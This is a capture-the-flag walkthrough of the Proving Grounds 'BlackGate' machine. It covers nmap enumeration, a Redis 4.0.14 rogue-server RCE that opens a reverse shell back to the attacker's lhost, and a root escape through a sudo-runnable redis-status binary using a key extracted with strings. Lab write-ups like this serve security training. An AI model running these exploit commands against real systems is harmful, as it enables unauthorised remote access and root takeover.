In this walk through, we will be going through the BlackGate room from Proving Grounds. This room is rated as Hard on the platform and it consist of exploitation of redis server RCE exploitation to get an initial shell followed by the exploitation of redis-status binary to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | BlackGate |
IPaddress | 192.168.195.176 |
Difficulty | Hard |
OS | Linux |
Description | BlackGate is a Hard Linux machine that requires redis server RCE exploitation to get an initial shell followed by the exploitation of redis-status binary to get root. |
Enumeration:
- I started off with a regular nmap aggressive scan and found only two ports opened – 22 (SSH) and 6379 (Redis).
$ sudo nmap -A 192.168.195.176 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-18 11:22 IST Nmap scan report for 192.168.195.176 Host is up (0.19s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.3p1: | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT* | 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT* | PRION:CVE-2016-20012 5.0 https://vulners.com/prion/PRION:CVE-2016-20012 | PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | PRION:CVE-2020-15778 4.4 https://vulners.com/prion/PRION:CVE-2020-15778 | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 | PRION:CVE-2021-41617 3.5 https://vulners.com/prion/PRION:CVE-2021-41617 | PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368 |_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368 53/tcp filtered domain No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=1/18%OT=22%CT=1%CU=39821%PV=Y%DS=4%DC=T%G=Y%TM=65A8BCB OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7% OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y% OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD= OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6E OS:21%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 205.15 ms 192.168.45.1 2 205.11 ms 192.168.45.254 3 205.77 ms 192.168.251.1 4 205.86 ms 192.168.195.176 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 40.33 seconds
sudo nmap -sS -p- -T5 192.168.195.176
- Enumerated redis with nmap scripts which revealed us the redis version running that was – 4.0.14
sudo nmap --script redis-info,redis-brute -p 6379 192.168.195.176
Initial Access:
- Next, i checked online for any exploits of the concerned version and found out that we can use Redis rogue server script to get a reverse shell back using the redis server.
./redis-rogue-server.py --rhost 192.168.195.176 --lhost 192.168.45.156
- Captured the local flag.
Privilege Escalation:
- Moving on, used Linpeas on the target to enumerate some potential privilege escalation vectors and found our that we can run redis-status binary as root.
- Checked for any strings that might be important for us using the string binary reveals a potential authorization key which is required by the redis-status binary.
strings /usr/local/bin/redis-status
ClimbingParrotKickingDonkey321
- Used the captured Authorization key in the binary and executed the command to spawn a shell once the binary is in halt after the processing which grants me a shell as root.
sudo /usr/local/bin/redis-status !/bin/sh
- Finally captured the root flag to complete the challenge.
Also Read: PG – Astronaut
Conclusion:
So that was “BlackGate” for you. We started off with a regular nmap scan and found only two port opened – 22 (SSH) and 6379 (Redis).. Enumerated the redis service and found out that the version running is 4.0.14. Looked online for any known exploit related to it and found that it is vulnerable to a Redis Rogue Server RCE vulnearbility. Got access using the concerned exploit and performed post-compromise enumeration with Linpeas. Found out a redis-status binary that we can run as sudo, abused it to get root on the system. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.